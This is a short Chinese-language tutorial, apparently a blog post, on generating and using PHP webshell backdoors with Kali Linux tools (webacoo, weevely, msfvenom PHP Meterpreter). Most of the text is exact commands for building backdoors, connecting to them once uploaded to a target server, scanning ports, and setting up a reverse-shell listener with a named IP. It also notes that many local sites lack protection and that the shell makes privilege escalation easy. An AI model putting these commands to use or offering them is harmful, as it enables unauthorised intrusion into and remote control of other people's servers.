很多時候在***測試時選擇web***害怕用的別人的馬帶有後門,這樣自己的辛苦就要被別人不勞而獲,很多時候我們都想擁有自己的馬,那麼這個時候你就應該使用kail來生成一個自己獨特密碼的web***了。
Kali Linux自帶有好幾個web***生成工具,下面我們來簡單看幾個:
1.webacoo後門
webacoo -g -o test.php
-g 製作後門代碼
-o 輸出生成指定的後門程序文件名
把web後門上傳到目標服務器後
使用kali linux訪問如下
webacoo -t -u http://www.xx.com/test.php
注意:上傳的路徑一定要正確
最後退出的時候使用exit退出
2.weevely
查看幫助信息
生成後門
下列命令可以生產混攪PHP backdoor , 密碼password 後門名字disaplay.php
weevely generate password disaplay.php
把後門文件上傳到服務器後,如下命令可以成功訪問
weevely http://www.xxx.com/disaplay.php password
通過help看到weevely有很多的module
.net.ifaces 查看服務器的端口信息
.net.scan 202.205.xx.xx 22 對服務器某個端口掃描
3.PHP Meterpreter
metasploit有一個名爲PHP Meterpreter的payload,可創建具有meterpreter功能的PHP webshell。
Metasploit的msfvenom工具可以製作PHP Meterpreter,命令如下:
msfvenom -p php/meterpreter/reverse_tcp LHOST=自己監聽的IP -f raw > php_meter.php
-p 設置payload
-f 設置輸出文件格式
但是使用前需要注意生成文件的第一行被註釋了,所以需要把註釋去掉才能使用
把webshell上傳到目標服務器,本地監聽打開如下:
啓動msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 202.205.7.162
然後我們就可以使用kali的metasploit功能對目標服務器進行一系列操作。
這種WEBSHELL 利用起來相當方便,輸入shell命令之後,就可以隨便提權什麼的了.
1,國內的貌似沒有防護這塊的,國內大多隻防護GET POST COOKIE這些數據.
2,缺點是如果服務器在DMZ,則失效.
3,more what ..... 這種shell如果被利用多了,肯定會有硬件廠商去做防護的.